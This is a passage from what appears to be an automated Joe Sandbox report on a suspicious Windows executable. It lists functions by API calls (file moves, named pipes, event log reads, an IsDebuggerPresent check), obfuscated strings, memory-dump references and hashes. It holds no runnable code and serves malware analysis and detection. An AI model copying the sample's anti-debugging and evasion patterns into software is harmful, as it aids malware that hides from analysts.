                                                                                                                                                                                                                                                                                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000), ref: 005CBD48
                                                                                                                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(Ruz,Koyotu zoxivevicoyin dixiyutije,00000000), ref: 005CBD5A
                                                                                                                                                                                                                                                                                                                                                                  • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 005CBD66
                                                                                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,sekiziguleguhu,00000000,jejalasejipakeyijinikekicelilup,00000000), ref: 005CBD7E
                                                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 005CBD84
                                                                                                                                                                                                                                                                                                                                                                  • _wprintf.LIBCMT ref: 005CBDA2
                                                                                                                                                                                                                                                                                                                                                                  • _calloc.LIBCMT ref: 005CBDAE
                                                                                                                                                                                                                                                                                                                                                                  • _calloc.LIBCMT ref: 005CBDBA
                                                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 005CBDDC
                                                                                                                                                                                                                                                                                                                                                                  • _calloc.LIBCMT ref: 005CBDF4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CB920: LoadLibraryA.KERNELBASE(msimg32.dll,005CBE83), ref: 005CB950
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBA8B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 005CBAA8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBABE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CBA50: FileTimeToLocalFileTime.KERNEL32 ref: 005CBADE
                                                                                                                                                                                                                                                                                                                                                                  • SetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 005CBECB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Time$DirectoryFile_calloc$AliasesConsoleCreateCurrentEnvironmentEventFreeInfoLocalOpenProcessStrings_memset$ByteCharCommCompareComputerConfigCountDateDefaultDestroyEnumErrorFormatsHandleHeapHostnameIconIncrementInterlockedLastLengthLibraryLoadLocaleModuleMoveMultiNameNamedObjectPipeReadResetSizeSpecificStartupStringSystemTickTimerWaitableWideWorking_wprintf
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %s %f %c$Koyotu zoxivevicoyin dixiyutije$Pev$Ruz$jejalasejipakeyijinikekicelilup$royariciguvecogowaditumihavozofilacuhadaxedayexecojafalanocitikogeduluwanifapu$sekiziguleguhu$tasazonobuwesixit$tl_
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 989382441-2729520857
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17dbf90c6575a7b1dc114b5eed1772f5fe5563bf3d4e22f23bf0fbeb77b7ecc1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cd02226622226ffa38fea76c291b95a36f1beab47ba32808e6d4245b6711607
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17dbf90c6575a7b1dc114b5eed1772f5fe5563bf3d4e22f23bf0fbeb77b7ecc1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68A13171945304EFEB30DB94DD4AB997B74BB24706F1041ABF2096A2E0D7B05A88DF26
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040DB5E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DB9D
                                                                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DBC6
                                                                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,0040E1C7,?,0040D0C0,?,000000BC,?), ref: 0040DBDA
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab0a5585f4728f4b083ab0203c76dcd914c290c613830b8fb672953e76dfbeaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e12e2266f2c5597963a076cac34a773335f46e64fde83a4c903977557fcff6cd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab0a5585f4728f4b083ab0203c76dcd914c290c613830b8fb672953e76dfbeaf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18017535A0560BBAEB219BE5EC05F5B77B8AF00759F210067F401F11C0EBB8EB49965D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00401114 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004016F1
                                                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401706
                                                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(005D3200), ref: 00401711
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040172D
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00401734
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6183995e8a9234be8f72c8ec433727ed1f4409292c1d0f17acdd460962d8939a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 14569deebbe99a70443352391f945edaa80685d3f17305dbca174a7e4b935e44
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6183995e8a9234be8f72c8ec433727ed1f4409292c1d0f17acdd460962d8939a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4021BBB49022469BC761DFA5E98D6453BB4BB29311F40405BE908972B0E7745A8DEF06
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005CBA50 Relevance: 6.0, APIs: 4, Instructions: 50pipetimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CB990: HeapAlloc.KERNEL32(00000000,00000000,00000000,005CBA80), ref: 005CB9A7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 005CB990: LoadLibraryA.KERNEL32(00000000), ref: 005CB9AF
                                                                                                                                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CBA8B
                                                                                                                                                                                                                                                                                                                                                                  • ReadEventLogA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 005CBAA8
                                                                                                                                                                                                                                                                                                                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CBABE
                                                                                                                                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32 ref: 005CBADE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileTime$AllocCreateEnvironmentEventFreeHeapLibraryLoadLocalNamedPipeReadStrings
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1576183245-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 076db8a4f83312987f1905256bfbc6c88339437fdf71772ccd15141eed5dfc8e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f214a78d01e731fb2b2b09246ad61fa8e859b9e9d03b3fea04ee85f7849c3906
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 076db8a4f83312987f1905256bfbc6c88339437fdf71772ccd15141eed5dfc8e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90012D712093059FD360DF54DC8AF9AB7A8FBA8705F00451FF2558B1A0D770654C9BA7
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040DFE8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesA.KERNEL32(Function_0000DC53,00000001), ref: 0040E001
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0f1d04744e5d00c2ef815cb5b12beb121860503e0ec7b56226c255df4b39f0f9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eb299e278418da065d182897ceefb9bca1dcfb37519375f169e4d4a0468a8bc0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f1d04744e5d00c2ef815cb5b12beb121860503e0ec7b56226c255df4b39f0f9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD05E70A547054BF7208E748D0876177D4E710B25F608B1ED966904D0C2B89488C600
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00403309 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000032C7), ref: 0040330E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 520091967093e70f54d6df6aff6eeac3e5907f5bcbc478060031739e706eef65
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af7747831dca90d067a641109b8f3fd4e4e1c0d0d7096b425751d24dc54ade0a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 520091967093e70f54d6df6aff6eeac3e5907f5bcbc478060031739e706eef65
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 089002642725004AC7512F745D1D6056AD46A69A0375104F76101D50E4DA6442086916
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004107AD Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 53e7a993a08d4f1314cc6d63b3145365b19ec4f38d275d4b0e75121257cfdf73
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C18073D1E5B2099B36462D081827FEE627E91B4031FC3B6DCD03F68DC62AAD8596D4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004103C5 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1724d26e09b0e7c601025cba9915ca15a0346a2244904aeb8534bb7587ed69f5
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DC18F73D0E5B2098B35862D485827FEE627E91B4031FC3B2DCD03F68DC62AAD9596D4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040FFF3 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f4d454fab585b742e79d078db1b75c7ed20682841ce97ba2a7b121d69b7d5e31
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66C17F33D4E5B24A8B36462D085827FEEA17E91B4031BC3B2DCD03F68DC62A6D8596D4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040FC55 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
